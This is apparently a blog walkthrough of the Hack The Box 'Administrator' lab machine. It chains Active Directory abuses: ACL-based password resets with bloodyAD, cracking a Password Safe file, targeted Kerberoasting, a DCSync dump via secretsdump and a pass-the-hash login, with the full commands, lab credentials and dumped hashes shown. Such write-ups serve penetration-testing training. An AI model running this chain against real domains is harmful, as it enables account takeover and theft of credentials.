Administrator - Hack The Box

Administrator - Hack The Box

Sebin Thomas
  2025-02-01 15:05 2025-02-01 15:05 Created   2025-08-07 14:50:55 2025-08-07 14:50:55 Updated    2.2k Words  13 Mins

Administrator is a Medium-rated Windows machine on Hack The Box that mimics real-world Active Directory pentesting. We start by using valid credentials for Olivia, who has access to change Michael’s password. After escalating privileges to Benjamin and gaining FTP access, we retrieve a .psafe3 file containing hashes. Cracking those hashes reveals Emily’s credentials, and using BloodHound, we identify a path for privilege escalation to Ethan. We then execute a Kerberoasting attack, crack Ethan’s hash, and gain further privileges. Finally, we dump the Administrator hash by Dsync misconfiguration.

Nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
➜  Administrator nmap -v -sCV -Pn 10.10.11.42 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-18 04:53 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:53
Completed NSE at 04:53, 0.00s elapsed
Initiating NSE at 04:53
Completed NSE at 04:53, 0.00s elapsed
Initiating NSE at 04:53
Completed NSE at 04:53, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:53
Completed Parallel DNS resolution of 1 host. at 04:53, 0.10s elapsed
Initiating SYN Stealth Scan at 04:53
Scanning 10.10.11.42 [1000 ports]
Discovered open port 135/tcp on 10.10.11.42
Discovered open port 21/tcp on 10.10.11.42
Discovered open port 139/tcp on 10.10.11.42
Discovered open port 53/tcp on 10.10.11.42
Discovered open port 445/tcp on 10.10.11.42
Discovered open port 3269/tcp on 10.10.11.42
Discovered open port 464/tcp on 10.10.11.42
Discovered open port 389/tcp on 10.10.11.42
Discovered open port 5985/tcp on 10.10.11.42
Discovered open port 88/tcp on 10.10.11.42
Discovered open port 3268/tcp on 10.10.11.42
Discovered open port 636/tcp on 10.10.11.42
Discovered open port 593/tcp on 10.10.11.42
Completed SYN Stealth Scan at 04:53, 6.15s elapsed (1000 total ports)
Initiating Service scan at 04:53
Scanning 13 services on 10.10.11.42
Completed Service scan at 04:54, 62.13s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.11.42.
Initiating NSE at 04:54
Completed NSE at 04:54, 13.03s elapsed
Initiating NSE at 04:54
Completed NSE at 04:55, 22.87s elapsed
Initiating NSE at 04:55
Completed NSE at 04:55, 0.00s elapsed
Nmap scan report for 10.10.11.42
Host is up (1.5s latency).
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-18 16:53:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-18T16:54:44
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m58s

NSE: Script Post-scanning.
Initiating NSE at 04:55
Completed NSE at 04:55, 0.00s elapsed
Initiating NSE at 04:55
Completed NSE at 04:55, 0.00s elapsed
Initiating NSE at 04:55
Completed NSE at 04:55, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.72 seconds
          Raw packets sent: 1097 (48.268KB) | Rcvd: 1098 (43.976KB)
➜  Administrator

Olivia credential validation

1
2
3
4
➜  Administrator cme smb administrator.htb -u 'olivia' -p 'ichliebedich'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\olivia:ichliebedich 
➜  Administrator

Bloodhound

Next, we use BloodHound to enumerate potential privilege escalation paths for Olivia:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  Administrator bloodhound-python -ns 10.10.11.42 -d administrator.htb -u 'olivia' -p 'ichliebedich' --zip -c all --dns-tcp
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 01M 40S
INFO: Compressing output into 20250218120443_bloodhound.zip
➜  Administrator

Resetting Michael’s Password via Olivia’s GenericWrite

After checking Bloodhound we are able to seee that Olivia has GenericAll permission on Michael user. So we will use bloodyAD for changing password of Michael.

1
2
➜  Administrator bloodyAD --host '10.10.11.42' -d 'administrator.htb' -u 'olivia' -p 'ichliebedich' set password 'MICHAEL' 'ichliebedich'
[+] Password changed successfully!

Validating Credentials for Michael

1
2
3
4
➜  Administrator cme smb administrator.htb -u 'michael' -p 'ichliebedich'
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\michael:ichliebedich 
➜  Administrator

Resetting Benjamin’s Password via ForceChangePassword


Checking bloodhound again we can see Michael has ForcechangePassword permission on Benjamin user. So we use BloodyAD again to change Benjamin's password.

1
2
➜  Administrator bloodyAD --host '10.10.11.42' -d 'administrator.htb' -u 'michael' -p 'ichliebedich' set password 'benjamin' 'ichliebedich'
[+] Password changed successfully!

Validating Credentials for Benjamin

1
2
3
4
➜  Administrator nxc smb administrator.htb -u 'benjamin' -p 'ichliebedich'                                                       
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\benjamin:ichliebedich 
➜  Administrator

FTP

Now after changing Benjamins password i don’t see that much permission or anything in Bloodhound. So i checked for FTP access, since we have FTP port 21 open.

1
2
3
➜  Administrator cme ftp administrator.htb -u 'benjamin' -p 'ichliebedich' 
FTP         administrator.htb 21     administrator.htb [*] Banner: Microsoft FTP Service
FTP         administrator.htb 21     administrator.htb [+] benjamin:ichliebedich

After successfull authentication i was able to login and get a psafe3 file from FTP.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
➜  Administrator ftp 10.10.11.42                                                                                                           
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||57121|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||57124|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************|   952        1.14 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:01 (0.79 KiB/s)
ftp> exit
221 Goodbye.
➜  Administrator

Cracking Password Safe (.psafe3) with John the Ripper

Since that .psafe3 file is password protected i used pwsafe2john to crack the password using john.

1
2
3
4
5
6
7
8
9
10
11
12
➜  Administrator pwsafe2john Backup.psafe3 > psafe-hash
➜  Administrator john psafe-hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2025-02-18 12:16) 2.777g/s 17066p/s 17066c/s 17066C/s newzealand..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
➜  Administrator

With that password i opened psafe file with (pwsafe)

Validating Emily’s Credentials from Psafe for SMB

I validated all users and associated password with crackmapexec and emily was a user with valid password.

1
2
3
4
5
6
7
8
9
10
➜  Administrator crackmapexec smb administrator.htb -u emma -p WwANQWnmJnGV07WQN8bMS7FMAbjNur
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE 
➜  Administrator crackmapexec smb administrator.htb -u alexander -p UrkIbagoxMyUGw0aPlj9B0AXSea4Sw                         
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE 
➜  Administrator crackmapexec smb administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb                                  
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb 
➜  Administrator

Kerberoasting with GenericWrite: Cracking Ethan’s Account

After checking bloodhound, I saw emily had a GenericWrite permission on ethan user, so used targetedKerberoast.py for getting kerberoast hash of ethan.

1
2
3
4
5
6
7
8
➜  Administrator targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$2c651041216ff1c252c13972700a9092$87c31393c1caa8d7c7226f2c772d7441ffd1daee5be02cbe9f6c4945c132d00ff0a99fa9c7492f98ff3b09dbdb707aad940a552ca7744779ea89d47b7a5aeeb7e264529072314ddf8eaf00a73198c15208d76054772602f4621dd487794750f02ac924c080e9e7ad4f943c89a3139722b175ad1391c8317111939cc6f854f29749ca2fa6eae9ec0d891a2c3ea425df608769a7dfd521c3c28a35eddd74b120e7304fabc4d55399edc01302bcf1352815271e201e55cec607912bac2dc805c0cdb8ce23d17fd1dc1c0af0301cd45a5bbaedadd8f178d6b8b8ccb7a9974008b6dbf1d74106115a38b36cced894d1736c051e767e67384f8c1f9766ce702c5bf817fe724457df42c4663b916cfa5e2ba543605eb119d37cf1b37b9fe574c6f5e11007e03e47c7759564319caa4db2f98c195175e2b3ec88bc835781dc8b570e37b1e55dbfddb13dc6115e8d543dde140ddab2f2bee0e045345d884264d23862a07d70b5477005cc85a2178e943bcfeb22af04925564b35c8783e54c9290ca0e0c70a38ebb49bb268af140f5a6b992be16c86728218b5cd09f69c34f03ba087b99ae167829748b3e49e168927fb73f72ce1a1ae216247128f9591e503c5820b5324ba2f1faa8258abab90caa1ca084d30af703c16b24f5be5718619fe7895238bf8c8082dae8e43239a28769c43581c14a38abde0c9eafcab7b9cbb615de04b15ca6eed670e2840f88fb10d763b8a2181ea626a0c1ab9b8d0da15c7bc04d75cde504b57e298ebdc5dcc9fac4f288bd48820850add10fc3f68baa0930894991da21563e26751b6ba39df818656ba7fc0441c3f702dc839ea64927e7a544bd9547746f4fe4001729a153d6cf562a42a895eac7d34ec94e7aa7ff512541f7325e01c76a6a857f704794de0714bf894e0e6ca89692ba230fe6c01896002579101d7aad484ea9227380d531081b334403367a2e43fadd15c009b78ef98cb429ef3091593b3115a6c891ebe664abc5a0d3408a53aac715627b257c3e4457649c0864da117d23cc47b0763bfc65a37c884dc3efca84d23f3c4af52408da5877bbdb8cd812f3399a643e75eafa320cdcdd5e17411eba5dbc2bc158580a56a54457ad027bddc10f3619db945cd131778f03a87e2d4c237a3891259d65353b979f1b0207ca5c4618602e56230168c0721e26a8a9150754826782970b1dd9c80ff91b6c3c191c1e1a0a7496f3ad902704c61de14a3a096e1a36044d6911233bdf5aa45274ea2dd8333ebd7e41c6e0dfa15c99d695d385472f794c303c5d2d21146e69db9ed1870af828ec5b380939fa0163b86a20130788a9b30c1c5c96e2acca2842c12cfb89a6a79b5e03547f14a7284604314052274aee12e7ef1ad062ce56e56bcea5011d7f098f428f238f0ab1a2631112f687ae92623d36940bac8877088aa2565fd4d594ce4f499bbe752fc90b23e9bebb6dc3b6338c40ec27c364905d905a6156e881572444df15519ed9c60cfc11482a409e3594d52ad429b1134559c8de36901300
[VERBOSE] SPN removed successfully for (ethan)
➜  Administrator

John the Ripper for Kerberos Hash Cracking

Ethan's hash was crackable and we got password.

1
2
3
4
5
6
7
8
9
10
➜  Administrator john kerb-hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2025-02-18 12:26) 20.00g/s 102400p/s 102400c/s 102400C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
➜  Administrator

Credential validation for Ethan

1
2
3
➜  Administrator crackmapexec smb administrator.htb -u 'ethan' -p 'limpbizkit'  
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [+] administrator.htb\ethan:limpbizkit

Dsync

Upon checking Bloodhound again i found that ethan had Dsync permission so used secretsdump to dump all hashes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
➜  Administrator secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@administrator.htb
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:409e1ae3a9e1d8531a7d9d2d83d0aa02f0d6c5a5435c621e3304b294fe32d4e9
administrator.htb\michael:aes128-cts-hmac-sha1-96:97cbb32467f5971a85b6beb994d12fdb
administrator.htb\michael:des-cbc-md5:e6851cb51f078ae3
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:85c174190270b6f36bd1318ea26a22c603901a57c78f3316c96f2a334b28107f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:df0b408d253e548c4ec180a082e3a593
administrator.htb\benjamin:des-cbc-md5:f7013ec492139dc4
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up... 
➜  Administrator

Administrator

1
2
3
4
5
➜  Administrator crackmapexec winrm administrator.htb -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
SMB         administrator.htb 5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP        administrator.htb 5985   DC               [*] http://administrator.htb:5985/wsman
WINRM       administrator.htb 5985   DC               [+] administrator.htb\Administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)
➜  Administrator
  • Title: Administrator - Hack The Box
  • Author: Sebin Thomas
  • Created at : 2025-02-01 15:05:00
  • Updated at : 2025-08-07 14:50:55
  • Link: https://0xsebin-blogs.vercel.app/2025/02/01/Administrator-HTB/
  • License: All Rights Reserved © Sebin Thomas
Comments
On this page
Administrator - Hack The Box
  1. Nmap scan
    1. Olivia credential validation
  2. Bloodhound
    1. Resetting Michael’s Password via Olivia’s GenericWrite
    2. Validating Credentials for Michael
    3. Resetting Benjamin’s Password via ForceChangePassword
    4. Validating Credentials for Benjamin
  3. FTP
  4. Cracking Password Safe (.psafe3) with John the Ripper
    1. Validating Emily’s Credentials from Psafe for SMB
    2. Kerberoasting with GenericWrite: Cracking Ethan’s Account
    3. John the Ripper for Kerberos Hash Cracking
    4. Credential validation for Ethan
  5. Dsync
  6. Administrator